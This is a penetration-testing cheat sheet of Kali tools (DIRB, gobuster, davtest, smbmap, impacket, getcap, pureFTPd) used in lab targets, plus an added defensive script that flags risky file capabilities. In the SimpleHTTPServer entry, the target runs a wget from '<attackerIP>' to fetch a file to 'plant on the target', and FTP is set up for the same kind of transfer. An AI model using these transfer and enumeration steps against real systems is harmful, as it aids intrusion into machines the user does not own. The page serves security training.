Hacking Tools

descriptions of tools that may or may not be default in Kali

more at apt-secure.ca


base64 decode

This is how you translate base64 to readable text (any trailing = padding is part of the string and goes inside the quotes)

#echo "<base64 string>" | base64 --decode

creating base64

#echo -n "string" | base64

(-n keeps echo's trailing newline out of the encoded output)

BurpSuite

verbose details here link

DIRB

Web content scanner that looks for existing (and/or hidden) web objects. Its primary function is launching a dictionary-based attack against a web server and analyzing the responses.

Usage: #dirb http://zyz.htb -r -z 10

davtest

Tool that tests uploading files to a WebDAV-enabled (and potentially vulnerable) web server

Usage: #davtest -url http://<ip>

getcap

Examines file capabilities. Displays the name and capabilities of each specified file.

Usage: #getcap -r /

Usage (same recursive search, with permission errors suppressed): #getcap -r / 2>/dev/null
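
Added example (not part of the original notes): a shell function that filters `getcap -r /` output down to binaries carrying root-equivalent capabilities, which is what an audit of that output looks for. The capability list, the function names and the sample lines are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): triage `getcap -r /` output.
# RISKY_CAPS is an assumed, non-exhaustive list of root-equivalent capabilities.
RISKY_CAPS='cap_setuid cap_setgid cap_sys_admin cap_sys_ptrace cap_sys_module cap_dac_override cap_dac_read_search cap_chown cap_fowner'

# Constructed sample covering both getcap output styles:
#   newer libcap: "<path> <caps>"     older libcap: "<path> = <caps>"
sample_getcap_output() {
    cat <<'EOF'
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.11 cap_setuid=ep
/opt/backup tool/tar = cap_dac_read_search+ep
/usr/local/bin/helper =ep
/usr/bin/gdb cap_sys_ptrace,cap_net_admin=eip
EOF
}

# Reads getcap output on stdin; prints "path<TAB>capability<TAB>flags" per risky hit.
# Assumes the capability clause is the last whitespace-separated field.
flag_risky_caps() {
    awk -v risky="$RISKY_CAPS" '
    BEGIN { n = split(risky, r, " "); for (i = 1; i <= n; i++) want[r[i]] = 1 }
    NF < 2 { next }                       # blank or malformed line
    {
        caps = $NF
        path = $0
        # Strip the clause (and the old-style " = " separator); paths may contain spaces.
        sub(/[ \t]+(=[ \t]+)?[^ \t]+$/, "", path)
        split(caps, part, /[=+]/)         # part[1] = names, part[2] = flag letters
        if (part[1] == "") {              # "=ep": every capability is granted
            print path "\tALL\t" part[2]
            next
        }
        m = split(part[1], c, ",")
        for (j = 1; j <= m; j++)
            if (c[j] in want) print path "\t" c[j] "\t" part[2]
    }'
}

# Live use: getcap -r / 2>/dev/null | flag_risky_caps
sample_getcap_output | flag_risky_caps
```

Anything this reports that is not a known, expected grant (ping with cap_net_raw is normal and is not flagged) is worth removing with setcap -r or investigating.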

gobuster

Similar to DIRB, a directory brute forcer

  • you will need to install it

    • #apt-get install gobuster

usage:

"common.txt" at the location you see here was a special download, you can use whatever wordlist you want.

impacket:

Installation:

#sudo apt-get install python3-pip

#sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Navigate to /opt/impacket

#sudo python3 ./setup.py install

pureFTPd

Used for transferring data between Kali and the target

INITIAL SETUP

On Kali

  • #apt-get install pure-ftpd

create ftp user

  • #groupadd ftpgroup (the group must exist before useradd -g can reference it)

  • #useradd -g ftpgroup -d /dev/null -s /etc ftpuser

  • #pure-pw useradd jonny -u ftpuser -d /ftphome

  • #pure-pw mkdb

  • #cd /etc/pure-ftpd/auth/

  • #ln -s ../conf/PureDB 60pdb (run inside /etc/pure-ftpd/auth)

  • #mkdir -p /ftphome

  • #chown -R ftpuser:ftpgroup /ftphome/

  • #systemctl restart pure-ftpd

Check Status

#systemctl status pure-ftpd

USAGE

From target

#ftp <kali IP>

login and download


SecLists

This is a user-made archive of a TON of scripts and various tools. It's insane.

Download like so:

#wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O SecList.zip

#unzip SecList.zip

#rm -f SecList.zip


SimpleHTTPServer (Python)

Used for file transfers between attacker and target. Typically there is something you want to plant on the target.

Usage: Attacker Machine: #python -m SimpleHTTPServer <port #>

Usage: Target: #wget http://<attackerIP>:<port>/<desired_file>

smbmap

SMB enumeration tool. Allows users to enumerate Samba share drives across an entire domain: list share drives, drive permissions and share contents, upload/download files, do pattern matching, and even execute remote commands.

Usage: #smbmap -H <ip>

tcpdump

Dumps network traffic. Used for analyzing traffic.

power usage link